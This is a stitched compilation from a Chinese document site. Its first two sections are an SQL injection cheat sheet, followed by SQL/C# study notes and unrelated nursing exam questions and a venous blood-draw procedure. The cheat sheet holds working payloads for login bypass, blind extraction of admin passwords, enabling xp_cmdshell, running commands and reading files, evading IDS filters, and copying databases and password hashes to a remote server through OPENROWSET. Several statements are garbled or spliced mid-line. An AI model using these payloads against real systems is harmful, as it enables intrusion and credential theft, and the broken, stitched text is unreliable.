第一篇：SQL注射技術(shù)總結(jié)文檔

天馬行空●狼技術(shù)小組[1.S.T ](http://004km.cn--------------

翻譯：浪跡天.Iceskysl@1.S.T

Iceskysl_At_004km.cn

1.Introduction.2.Testing for vulnerabilities.3.Gathering Information.4.Data types.5.Grabbing Passwords.6.Create DB accounts.7.MySQL OS Interaction.8.Server name and config.9.Retrieving VNC password from registry.10.IDS Signature Evasion.11.mySQL Input Validation Circumvention using Char().12.IDS Signature Evasion using comments.13.Strings without quotes.1.When a box only has port 80 open, it's almost certain the admin will patch his server, The best thing to turn to is web attacks.Sql Injection is one of the most common web attacks.You attack the web application,(ASP, JSP, PHP, CGI..etc)rather than the webserver or the services running on the OS.Sql injection is a way to trick using a qurey or command as a input via webpages，most websites take parameters from the user like username and passwrod or even their emails.They all use Sql querys.2.First of you should start with something simple.Pass:' or 1=1--' having 1=1--' SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablename')--' or 1 in(select @@version)--' and 1 in(select servername from master.sysservers)--

9.Retrieving VNC password from registry.-';declare @out binary(8)@rootkey = 'HKEY_LOCAL_MACHINE',@value_name='password',select cast(@out as bigint)as x into TEMP--' OR 'something' = 'some'+'thing'' OR 'something' like 'some%'' OR 'text' > 't'' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().Inject without quotes(string = “%”):--> ' or username like char(37);Inject with quotes(string=“root”):--> ' union select * from users where login = char(114,111,111,116);load files in unions(string = “/etc/passwd”):-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;Check for existing files(string = “n.ext”):-->' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.-->'/**/OR/**/1/**/=/**/1-->Username:' or 1/*-->Password:*/=1---->UNI/**/ON SEL/**/ECT-->(Oracle)

';EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'-->(MS SQL)

';EXEC('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.--> INSERT INTO Users(Login, Password, Level)VALUES(char(0x70)+ char(0x65)+ char(0x74)+ char(0x65)+ char(0x72)+ char(0x70)+ char(0x65)+ char(0x74)+ char(0x65)+ char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.8

第二篇：SQL注射語句的經(jīng)典總結(jié)

SQL注射語句的經(jīng)典總結(jié)

SQL注射語句的經(jīng)典總結(jié) SQL注射語句

1.判斷有無注入點

';and 1=1 and 1=2

2.猜表一般的表的名稱無非是admin adminuser user pass password 等..and 0<>(select count(*)from *)

and 0<>(select count(*)from admin)---判斷是否存在admin這張表

3.猜帳號數(shù)目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數(shù)目就是1個

and 0<(select count(*)from admin)and 1<(select count(*)from admin)

4.猜解字段名稱 在len()括號里面加上我們想到的字段名稱.and 1=(select count(*)from admin where len(*)>0)--

and 1=(select count(*)from admin where len(用戶字段名稱name)>0)and 1=(select count(*)from admin where len(密碼字段名稱password)>0)

5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止

and 1=(select count(*)from admin where len(*)>0)

and 1=(select count(*)from admin where len(name)>6)錯誤

and 1=(select count(*)from admin where len(name)>5)正確 長度是6 and 1=(select count(*)from admin where len(name)=6)正確

and 1=(select count(*)from admin where len(password)>11)正確

and 1=(select count(*)from admin where len(password)>12)錯誤 長度是12 and 1=(select count(*)from admin where len(password)=12)正確

6.猜解字符

and 1=(select count(*)from admin where left(name,1)='a')---猜解用戶帳號的第一位

and 1=(select count(*)from admin where left(name,2)='ab')---猜解用戶帳號的第二位

就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了

and 1=(select top 1 count(*)from Admin where Asc(mid(pass,5,1))=51)--這個查詢語句可以猜解中文的用戶和密碼.只要把后面的數(shù)字換成中文的ASSIC碼就OK.最后把結(jié)果再轉(zhuǎn)換成字符.看服務(wù)器打的補(bǔ)丁=出錯了打了SP4補(bǔ)丁

and 1=(select @@VERSION)--

看數(shù)據(jù)庫連接賬號的權(quán)限，返回正常，證明是服務(wù)器角色sysadmin權(quán)限。

and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--

判斷連接數(shù)據(jù)庫帳號。（采用SA賬號連接 返回正常=證明了連接賬號是SA）

and 'sa'=(Select System_user)--and user_name()='dbo'--and 0<>(select user_name()--看xp_cmdshell是否刪除

and 1=(Select count(*)FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')--

xp_cmdshell被刪除，恢復(fù),支持絕對路徑的恢復(fù)

;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--;EXEC master.dbo.sp_addextendedproc

'xp_cmdshell','c:inetpub004km.cn;Address=192.168.0.1,1433;', 'select * from table'

3.復(fù)制目標(biāo)主機(jī)的整個數(shù)據(jù)庫insert所有遠(yuǎn)程表到本地表。

基本語法：

insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')select * from table2

這行語句將目標(biāo)主機(jī)上table2表中的所有數(shù)據(jù)復(fù)制到遠(yuǎn)程數(shù)據(jù)庫中的table1表中。實際運用中適當(dāng)修改連接字符串的IP地址和端口，指向需要的地方，比如：

insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select

* from table1')select * from table2 insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases')

select * from master.dbo.sysdatabases

insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects')

select * from user_database.dbo.sysobjects insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns')

select * from user_database.dbo.syscolumns 復(fù)制數(shù)據(jù)庫：

insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select

* from table1')select * from database..table1 insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select

* from table2')select * from database..table2

復(fù)制哈西表（HASH）登錄密碼的hash存儲于sysxlogins中。方法如下：

insert into OPENROWSET('SQLOLEDB'，'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from

_sysxlogins')select * from database.dbo.sysxlogins 得到hash之后，就可以進(jìn)行暴力破解。

遍歷目錄的方法： 先創(chuàng)建一個臨時表：temp

';create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

';insert temp exec master.dbo.xp_availablemedia;--獲得當(dāng)前所有驅(qū)動器

';insert into temp(id)exec master.dbo.xp_subdirs 'c:';--獲得子目錄列表

';insert into temp(id,num1)exec master.dbo.xp_dirtree 'c:';--獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中

';insert into temp(id)exec master.dbo.xp_cmdshell 'type c:webindex.asp';--查看某個文件的內(nèi)容

';insert into temp(id)exec master.dbo.xp_cmdshell 'dir c:';--

';insert into temp(id)exec master.dbo.xp_cmdshell 'dir c: *.asp /s/a';--

';insert into temp(id)exec master.dbo.xp_cmdshell 'cscript C:InetpubAdminScriptsadsutil.vbs enum w3svc'

';insert into temp(id,num1)exec master.dbo.xp_dirtree 'c:';--（xp_dirtree適用權(quán)限PUBLIC）

寫入表：

語句1：and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--語句2：and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--

語句3：and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--語句4：and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--語句5：and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--語句6：and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--語句7：and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--語句8：and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--語句9：and 1=(Select IS_MEMBER('db_owner'));--把路徑寫到表中去：

;create table dirs(paths varchar(100), id int)--;insert dirs exec master.dbo.xp_dirtree 'c:'--and 0<>(select top 1 paths from dirs)--

and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--;create table dirs1(paths varchar(100), id int)--;insert dirs exec master.dbo.xp_dirtree 'e:web'--and 0<>(select top 1 paths from dirs1)--把數(shù)據(jù)庫備份到網(wǎng)頁目錄：下載

;declare @a sysname;set @a=db_name();backup database @a to disk='e:webdown.bak';--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85))T order by id desc)

and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1)from sysobjects)參看相關(guān)表。

and 1=(select user_id from USER_LOGIN)

and 0=(select user from USER_LOGIN where user>1)-=-wscript.shell example-=-declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

';declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--declare @o int, @f int, @t int, @ret int declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'opentextfile', @f out, 'c:boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while(@ret = 0)begin print @line

exec @ret = sp_oamethod @f, 'readline', @line out end

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:inetpubwwwrootfoo.asp', 1

exec @ret = sp_oamethod @f, 'writeline', NULL, ''

declare @o int, @ret int

exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150

exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528

waitfor delay '00:00:05'

';declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--xp_dirtree適用權(quán)限PUBLIC exec master.dbo.xp_dirtree 'c:'

返回的信息有兩個字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。

create table dirs(paths varchar(100), id int)

建表，這里建的表是和上面xp_dirtree相關(guān)連，字段相等、類型相同。

insert dirs exec master.dbo.xp_dirtree 'c:'

只要我們建表與存儲進(jìn)程返回的字段相定義相等就能夠執(zhí)行！達(dá)到寫表的效果,一步步達(dá)到我們想要的信息！

第三篇：SQL總結(jié)

1.SQL語句的With cte as用法：

with as短語，也叫做子查詢部分。即定義一個SQL片斷，該片斷會讓整個SQL語句所用到。eg：

with

cr as

(select CountryRegionCode from person.CountryRegion where Name like 'C%')

select * from person.StateProvince where CountryRegionCode in(select * from cr)

CTE后面必須直接跟使用CTE的SQL語句(如select,insert,update等)，否則，CTE將失效。CTE后面也可以跟其他的CTE，但只能使用一個with，多個CTE中間用逗號(,)分隔。eg：

with

cte1 as

(select * from table1 where name like 'abc%'),cte2 as

(select * from table2 where id > 20),cte3 as

(select * from table3 where price < 100)

select a.* from cte1 a, cte2 b, cte3 c where a.id = b.id and a.id = c.id

2.case when then多條件判斷：

CASE

WHEN 條件1 THEN 結(jié)果1

WHEN 條件2 THEN 結(jié)果2

WHEN 條件3 THEN 結(jié)果3

WHEN 條件4 THEN 結(jié)果4

.........WHEN 條件N THEN 結(jié)果N

ELSE 結(jié)果X

END

Case具有兩種格式。簡單Case函數(shù)和Case搜索函數(shù)。

--簡單Case函數(shù)

CASE sex

WHEN '1' THEN '男'

WHEN '2' THEN '女'

ELSE '其他' END

--Case搜索函數(shù)

CASE WHEN sex = '1' THEN '男'

WHEN sex = '2' THEN '女'

ELSE '其他' END

3.select語句前面加@轉(zhuǎn)義字符的作用是強(qiáng)制后面的字符串中不使用轉(zhuǎn)義字符，當(dāng)作字符串

處理。

eg：string ss=@“aanaa”;輸出：aanaa

string ss=“aanaa”;

輸出：aa

aa

4.select getdate()：從SQL SERVER返回當(dāng)前的時間與日期。

select first():函數(shù)返回指定的字段中第一個記錄的值。

select last():函數(shù)返回指定的字段中最后一個記錄的值。

select ucase():把字段的值轉(zhuǎn)換為大寫。

select lcase():把字段的值轉(zhuǎn)換為小寫。

select round():用于把數(shù)值字段設(shè)入為指定的小數(shù)位數(shù)。SELECT ROUND(column_name,decimals)FROM table_name

column_name 必需。要舍入的字段。decimals 必需。規(guī)定要返回的小數(shù)位數(shù)。format():用于對字段的顯示進(jìn)行格式化。

SELECT ProductName, UnitPrice, FORMAT(Now(),'YYYY-MM-DD')as PerDate FROM Products

5.union與union all的區(qū)別：

對重復(fù)結(jié)果的處理，UNION ALL 會將每一筆符合條件的資料都列出來，無論資料值有無重復(fù)

6.SELECT INTO 語句從一個表中選取數(shù)據(jù)，然后把數(shù)據(jù)插入另一個表中。

SELECT INTO 語句常用于創(chuàng)建表的備份復(fù)件或者用于對記錄進(jìn)行存檔。

將整個table1復(fù)制到table2中：

INSERT INTO SELECT語句

語句形式為：Insert into Table2(field1,field2,...)select value1,value2,...from Table1（要求目標(biāo)表Table2必須存在，由于目標(biāo)表Table2已經(jīng)存在，所以我們除了插入源表Table1的字段外，還可以插入常量。）

SELECT INTO FROM語句

語句形式為：SELECT value1, value2 into Table2 from Table1（要求目標(biāo)表Table2不存在，因為在插入時會自動創(chuàng)建表Table2，并將Table1中指定字段數(shù)據(jù)復(fù)制到Table2中）

7.nchar ：固定長度的 Unicode 數(shù)據(jù)，最大長度為 4,000 個字符。

nvarchar：可變長度Unicode 數(shù)據(jù)，其最大長度為4,000字符。

char: 固定長度的非 Unicode 字符數(shù)據(jù)，最大長度為 8,000 個字符。

varchar：可變長度的非Unicode數(shù)據(jù)，最長為8,000 個字符。

char和varchar都是字符串類型的，用Unicode編碼的字符串,結(jié)果是字符的整數(shù)值.8.select 1 from:

select 1 from mytable;與select anycol(目的表集合中的任意一行）from mytable;與select * from mytable 作用上來說是沒有差別的，都是查看是否有記錄，一般是作條件用的。select 1 from 中的1是一常量，查到的所有行的值都是它，但從效率上來說，1>anycol>*，因為不用查字典表。

查看記錄條數(shù)可以用select sum(1)from mytable;等價于select sum(*)from mytable;

9.SQL中的字符匹配：

[NOT] LIKE '<匹配串>' [ESCAPE '<換碼字符>']

<匹配串>可以是一個完整的字符串，也可以含有通配符%和_

%代表任意長度的字符串。eg：a%b表示以a開頭以b結(jié)尾的任意長度的字符串。_代表任意單個字符。eg：a_b表示以a開頭，以b結(jié)尾的長度為3的任意字符串。ESCAPE定義轉(zhuǎn)義字符，當(dāng)轉(zhuǎn)義符置于通配符之前時，該通配符解釋為普通字符。

10.GROUP BY子句將查詢結(jié)果按某一列或多列的值分組，值相等的為一組。HAVING短語給出選擇組的條件。

11.ROW_NUMBER()OVER函數(shù)的基本用法 ：

row_number()OVER(PARTITION BY COL1 ORDER BY COL2)表示根據(jù)COL1分組，在分組內(nèi)部根據(jù) COL2排序，而此函數(shù)計算的值就表示每組內(nèi)部排序后的順序編號（組內(nèi)連續(xù)的唯一的)

select row_number()over(order by field2 desc)as row_number,* from t_table order by field1 desc Desc：倒序，Asc：正序

12.DbDataAdapter.Fill 方法(DataTable, IDbCommand, CommandBehavior)：

在DataTable中添加或刪除新行以匹配使用指定 DataTable 和 IDataReader 名稱的數(shù)據(jù)源中的行。

13.SqlCommand.ExecuteScalar 方法：執(zhí)行查詢，并返回查詢所返回的結(jié)果集中第一行的第一列，忽略其他列或行。

14.inner join(等值連接)只返回兩個表中聯(lián)結(jié)字段相等的行

left join(左聯(lián)接)返回包括左表中的所有記錄和右表中聯(lián)結(jié)字段相等的記錄

right join(右聯(lián)接)返回包括右表中的所有記錄和左表中聯(lián)結(jié)字段相等的記錄

15.e.Item.ItemType==ListItemType.Item||e.Item.ItemType==ListItemType.AlternatingItem指觸發(fā)的類型為DadaList中的基本行或內(nèi)容行

16.order by的用法：

如果Order by 中指定了表達(dá)式Nulls first則表示null值的記錄將排在最前(不管是asc 還是 desc)

如果Order by 中指定了表達(dá)式Nulls last則表示null值的記錄將排在最后(不管是asc 還是 desc)

eg：將nulls始終放在最前

select * from zl_cbqc order by cb_ld nulls first

--將nulls始終放在最后

select * from zl_cbqc order by cb_ld desc nulls last

單列升序：select from order by ;（默認(rèn)升序，即使不寫ASC）

單列降序：select from order by desc;

多列升序：select , from order by , ;

多列降序：select , from order by desc, desc;

多列混合排序：select , from order by desc, asc;

17.C#中NULL,“",DBNULL,String.Empty,Convert.IsDBNull區(qū)別

(1)NULL

null 關(guān)鍵字是表示不引用任何對象的空引用的文字值。null 是引用類型變量的默認(rèn)值。那么也只有引用型的變量可以為NULL，如果 int i=null,的話，是不可以的，因為Int是值類型的。

(2)DBNULL

DBNull在DotNet是單獨的一個類型,該類只能存在唯一的實例,DBNULL.Value,DBNull唯一作用是可以表示數(shù)據(jù)庫中的字符串，數(shù)字，或日期，為什么可以表示原因是DotNet儲存這些數(shù)據(jù)的類（DataRow等）都是以 object 的形式來儲存數(shù)據(jù)的。對于 DataRow , 它的 row[column] 返回的值永遠(yuǎn)不為 null，要么就是具體的為column 的類型的值。要么就是 DBNull。所以 row[column].ToString()這個寫法永遠(yuǎn)不會在ToString那里發(fā)生NullReferenceException。DBNull 實現(xiàn)了 IConvertible。但是，除了 ToString 是正常的外，其他的ToXXX都會拋出不能轉(zhuǎn)換的錯誤。

(3)”“和String.Empty

這兩個都是表示空字符串，其中有一個重點是string str1=”“ 和 string str2=null 的區(qū)別，這樣定義后，str1是一個空字符串，空字符串是一個特殊的字符串，只不過這個字符串的值為空，在內(nèi)存中是有準(zhǔn)確的指向的，string str2=null,這樣定義后，只是定義了一個string 類的引用，str2并沒有指向任何地方，在使用前如果不實例化的話，都將報錯。

(4)Convert.IsDBNull()

Convert.IsDBNull()返回有關(guān)指定對象是否為 DBNull 類型的指示,即是用來判斷對象是否為DBNULL的。其返回值是True或Flase。

string.Empty不分配存儲空間

”“分配一個長度為空的存儲空間

所以一般用string.Empty

null表示一個對象的指向無效，即該對象為空對象

DBNull。Value表示一個對象在數(shù)據(jù)庫中的值為空，或者說為初始化，DBNull。Value對象指向有效的對象

18.DataSet.Relations.add()：獲取用于將表鏈接起來并允許從父表瀏覽到子表的關(guān)系的集合。DataSet.Relations.Add(”關(guān)聯(lián)名稱“, 父關(guān)聯(lián)主鍵字段, 子關(guān)聯(lián)外來鍵字段)

19.DataBind():在Page_Load方法中我們建立了一個數(shù)組(ArrayList),并通過DataBind方法將這個數(shù)組捆綁到了DropDownList控件中，使得DropDownList最后有數(shù)據(jù)顯示：）

20.IN 操作符允許我們在 WHERE 子句中規(guī)定多個值。

SQL IN 語法:SELECT column_name(s)FROM table_nameWHERE column_name IN(value1,value2,...)

21.DataBinder.Eval方法:在運行時使用反射來分析和計算對象的數(shù)據(jù)綁定表達(dá)式<%# DataBinder.Eval(Container.DataItem, ”ColumnName“)%>

eval()函數(shù)可計算某個字符串，并執(zhí)行其中的的 JavaScript 代碼。

可以理解為反射的綁定

或者理解為將Eval()里的字符串轉(zhuǎn)換為表達(dá)式

在數(shù)據(jù)綁定的時候常用，其實是通過反射的手段實現(xiàn)了綁定

22.sql語句 count(1)與 count(*)的區(qū)別 :

count(1)，其實就是計算一共有多少符合條件的行。

1并不是表示第一個字段，而是表示一個固定值。

其實就可以想成表中有這么一個字段，這個字段就是固定值1，count(1)，就是計算一共有多少個1.count(*)，執(zhí)行時會把星號翻譯成字段的具體名字，效果也是一樣的，不過多了一個翻譯的動作，比固定值的方式效率稍微低一些。

23.DataTable.NewRow ：創(chuàng)建與該表具有相同框架的新的DataRow

24.ExcuteNonQuery():

如果要創(chuàng)建或修改數(shù)據(jù)庫結(jié)構(gòu)，操作成功時返回值為-1；如果要更新記錄，返回值為操作影響的記錄數(shù)；

ExecuteNonQuery()方法主要用于用戶更新數(shù)據(jù)，通常它使用Update,Insert,Delete語句來操作數(shù)據(jù)庫，其方法返回值意義：對于 Update,Insert,Delete 語句 執(zhí)行成功是返回值為該命令所影響的行數(shù)，如果影響的行數(shù)為0時返回的值為0，如果數(shù)據(jù)操作回滾得話返回值為-1，關(guān)于MyCommand的ExecuteNonQuery(),ExecuteScalar(),ExecuteReader方法的區(qū)別:

***ExecuteNonQuery():執(zhí)行SQL，返回一個整型變量，如果SQL是對數(shù)據(jù)庫的記錄進(jìn)行操作，那么返回操作影響的記錄條數(shù)，如果是SQL=”CREATE TABLE LookupCodes(code_id smallint IDENTITY(1,1)PRIMARY KEY CLUSTERED, code_desc varchar(50)NOT NULL)"那么在表創(chuàng)建成功后該方法返回-1。

***ExecuteScalar()：執(zhí)行SQL，（如果SQL是查詢Select）返回查詢結(jié)果的第一行第一列，如果（如果SQL不是查詢Select）那么返回未實列化的對象，因為對象未實列化，所以返回結(jié)果不能ToString(),不能Equals(null)，也就是說返回結(jié)果沒有任何作用

***executeReader方法執(zhí)行SQL，（如果SQL是查詢Select）返回查詢結(jié)果的集合，類型是 System.Data.OleDb.OleDbDataReader，你可以通過此結(jié)果，獲取查詢的數(shù)據(jù)。如果（如果SQL不是查詢Select）那么返回一個沒有任何數(shù)據(jù)的System.Data.OleDb.OleDbDataReader類型的集合(EOF)

25.DbDataAdapter.Fill 方法(DataTable)：在 DataSet 的指定范圍中添加或刷新行，以與使用 DataTable 名稱的數(shù)據(jù)源中的行匹配。

26.Decimal：decimal(2,1)，有效長度為2，小數(shù)位占1位。

varchar：可變長度的非Unicode數(shù)據(jù)，最長為8,000 個字符。

nvarchar：可變長度Unicode 數(shù)據(jù)，其最大長度為4,000字符。

char: 固定長度的非 Unicode 字符數(shù)據(jù)，最大長度為 8,000 個字符。

nchar ：固定長度的 Unicode 數(shù)據(jù)，最大長度為 4,000 個字符。

char和varchar都是字符串類型的，用Unicode編碼的字符串,結(jié)果是字符的整數(shù)值.timestamp:數(shù)據(jù)類型是一種特殊的數(shù)據(jù)類型，用來創(chuàng)建一個數(shù)據(jù)庫范圍內(nèi)的唯一數(shù)碼。一個表中只能有一個timestamp列。每次插入或修改一行時，timestamp列的值都會改變。盡管它的名字中有“time”，但timestamp列不是人們可識別的日期。在一個數(shù)據(jù)庫里,timestamp值是唯一的Uniqueidentifier特殊數(shù)據(jù)型

SELECT UPPER('Kelly'):upper是數(shù)據(jù)庫的字符串函數(shù)，它的作用是將傳遞給它的英文字符串中小寫字母轉(zhuǎn)換為大寫（大寫的保持不變）；

SELECT LOWER('kelly'):lower將指定字符串中的大寫字母換成小寫字母

SUBSTRING（colunm name,startposition,length）從指定字符串中取字符

eg:SQL實例：

顯示每個地區(qū)的總?cè)丝跀?shù)和總面積．

SELECT region, SUM(population), SUM(area)

FROM bbc

GROUP BY region

先以region把返回記錄分成多個組，這就是GROUP BY的字面含義。分完組后，然后用聚合函數(shù)對每組中的不同字段（一或多條記錄）作運算。

顯示每個地區(qū)的總?cè)丝跀?shù)和總面積．僅顯示那些面積超過1000000的地區(qū)。

SELECT region, SUM(population), SUM(area)

FROM bbc

GROUP BY region

HAVING SUM(area)>1000000

27.SELECT [ALL|DISTINCT] <目標(biāo)列表達(dá)式> [別名] [，<目標(biāo)列表達(dá)式> [別名]]…… FROM <表名或視圖名> [別名] [,<表名或視圖名> [別名]]……

[WHERE <條件表達(dá)式>]

[GROUP BY <列名1> [HAVING <條件表達(dá)式>]]

[ORDER BY <列名2> [ASC|DESC]]

INSERT

INTO <表名> [(<屬性列1>[,<屬性列2>……])]

VALUES(<常量1> [,<常量2>]……)

UPDATE <表名>

SET <列名>=<表達(dá)式> [,<列名>=<表達(dá)式>]……

[WHERE <條件>]

DELETE

FROM <表名>

[WHERE <條件>]

第四篇：皮內(nèi)注射技術(shù)試題

采血技術(shù)操作試題

一、填空題（2分/空 共50分）

1.靜脈采血法目前包括（）和（）兩種?？赡馨l(fā)生的并發(fā)癥包括()()()()()2.掌握正確的穿刺方右手持注射器，針頭和皮膚成（）或（），在股動脈內(nèi)側(cè)（）處刺入，見抽出暗紅血液，表示已達(dá)股靜脈。

3.評估血管條件，盡量選擇（）（）（）淺表靜脈。4.采血前應(yīng)評估患者（）（）（）（）等。5.采血后有效按壓是（）的有效措施。

6.動脈前認(rèn)真選擇血管，避免在已出現(xiàn)（）（）（）（）等情況的部位穿刺。

7.動脈穿刺采血法操作主要用于（）.8.動脈穿刺采血操作已經(jīng)成為護(hù)士必須熟練掌握的臨床護(hù)理技術(shù)，但該操作需要較高的技術(shù)，操作不當(dāng)，會造成諸多不良后果，如()（）（）（）（）（）（）（）等。

二、選擇題（5分/題 共50分）

1、靜脈穿刺是實驗室試驗獲取（）樣本的主要技術(shù)和方法 A體液 B血液 C 腦脊液 D尿液

2.采血對象取坐位或臥位，手臂伸直平放在床邊或臺面，腕下墊枕上，暴露穿 刺部位，找好合適采血靜脈后，在靜脈穿刺部位上方4-7厘米處扎緊壓脈帶，捆綁時間不應(yīng)超過（A）A 1分 B 2分 C 3分 D 4分

3.當(dāng)輕壓或輕拍時能感覺其回彈的靜脈即為合適血管。最常用的選擇部位是 血管豐富并且血管貼近皮膚表層的（D）

A上臂區(qū)域 B 上肢區(qū)域 C 肘后區(qū)域 D 肘前區(qū)域

4.使針與皮膚成（），在靜脈上或旁側(cè)刺入皮下，再沿靜脈走向 潛行刺入靜脈，待回血后，將針頭順勢探入少許固定不動，以免采血時針頭滑出,但不可用力深刺，以免造成血腫。

A l5度一30度 B 15-20度 C 20-30度 D30-40度

5.抽血至所需量，放松壓脈帶，用無菌棉簽壓住進(jìn)針處拔針，將采樣對象前臂 屈曲壓迫(3-5分鐘)A 1-2分鐘 B 2-4分鐘 C 3-5分鐘 D 4-6分鐘 6.采血后發(fā)生暈厥或眩暈，可讓其（平臥）休息片刻，即可恢復(fù)。A平臥 B坐臥 C斜臥 D 站立 7.血氣分析時，標(biāo)本的采集處理中，以下做法錯誤的是（）

A．采集動脈血 B．以肝素抗凝 C．立即送檢 D．不需與空氣隔絕 E．抽血后將針頭刺入膠塞搖勻血液 8.股動脈位于（）

A．股三角內(nèi)由髂外動脈發(fā)出 B ．股神經(jīng)外側(cè) C．股靜脈內(nèi)側(cè) D．股靜脈外側(cè) E．股深動脈內(nèi)側(cè)

9.動脈采血技術(shù)用于（）

A．交叉配血

B．血常規(guī) C．血氣分析 D．血生化 10.采集動脈血穿刺針頭斜面最佳穿刺角度是（）

A.向上與皮膚呈45度-90度 B向下與皮膚呈45度-90度 C.向上與皮膚呈60度 D向上與皮膚呈30度 E。向上與皮膚呈15度

第五篇：靜脈采血與注射技術(shù)

靜脈采血與注射技術(shù)

概念：

自靜脈抽取血標(biāo)本或注入藥液的方法 常用靜脈：

1、四肢淺靜脈：上肢常用肘部淺靜脈（貴要靜脈、肘正中靜脈、頭靜脈）腕部及手背靜脈，下肢常用大隱靜脈、小隱靜脈及足背靜脈

2、頭皮靜脈 3：股靜脈

靜脈采血技術(shù) 目的：

為患者采集，留取靜脈血標(biāo)本，協(xié)助臨床診斷疾病，為臨床治療提供依據(jù) 血標(biāo)本分為：

1、全血標(biāo)本：測定血沉及血液中某些物質(zhì)如血糖、尿素氮、肌酐、尿酸、肌酸、血氨的含量。

2、血清標(biāo)本：測定肝功能、血清酶、脂類、電解質(zhì)等。

3、血培養(yǎng)標(biāo)本：培養(yǎng)檢測血液中的病原菌。操作前準(zhǔn)備階段

?

1、衣帽整齊、規(guī)范洗手、戴口罩；

?

2、用物：治療車、清潔治療盤、棉簽、皮膚消毒液、手消毒液、止血帶、彎盤、手套，根據(jù)醫(yī)囑備注射器、標(biāo)本容器、利器盒、試管架、小墊巾；

?

3、核對檢驗單、標(biāo)本容器，貼化驗單附聯(lián)標(biāo)簽，按要求填寫各項內(nèi)容，檢查標(biāo)本容器是否完好；

?

4、將物品按順序置于治療車上。操作步驟階段

1、將用物推至患者床旁，核對床號、姓名、并詢問患者的名字，向患者說明目的及配合方法，詢問患者是否按要求進(jìn)行采血前準(zhǔn)備；

2、再次核對檢驗單，并協(xié)助患者取舒適臥位；

3、選擇合適的穿刺部位，評估穿刺部位皮膚及血管情況并征求患者意見，鋪小墊巾，放好止血帶，進(jìn)行手消毒；

4、消毒皮膚、扎止血帶，再次消毒皮膚，囑患者握拳；

5、戴手套，按靜脈穿刺法穿刺血管，見回血后抽取所需血量，松止血帶，囑患者松手，迅速拔出針頭、用干棉簽囑患者按壓局部3~5min、勿揉搓

；

6、取下針頭，跟據(jù)檢查目的將血液沿管壁注入標(biāo)本容器，脫去手套；

7、再次核對，協(xié)助患者取舒適臥位，整理用物并致謝，規(guī)范洗手；

8、標(biāo)本連同檢驗單及時送檢；

9、必要時記錄抽血時間、抽血量。注意事項

?

1、血標(biāo)本做生化檢驗時，應(yīng)在病人空腹時采取，此時血液的各種化學(xué)成分處于相對穩(wěn)定狀態(tài)，檢驗結(jié)果比較 準(zhǔn)確。因此，應(yīng)事先通知病人，避免因進(jìn)食水而影響檢驗結(jié)果。

?

2、根據(jù)不同的檢驗?zāi)康倪x擇標(biāo)本容器，并計算所需血量。一般血培養(yǎng)取血3～5ml，亞急性細(xì)菌性心內(nèi)膜炎病人為提高陽性培養(yǎng)率，采血量需增至10～15ml。?

3、嚴(yán)禁在輸液、輸血的針頭處取血，以免影響檢驗結(jié)果應(yīng)在對側(cè)肢體采集。

?

4、同時抽取幾項檢驗標(biāo)本，一般注入容器的順序為：血培養(yǎng)瓶→抗凝管→干燥管，動作應(yīng)迅速準(zhǔn)確。

?

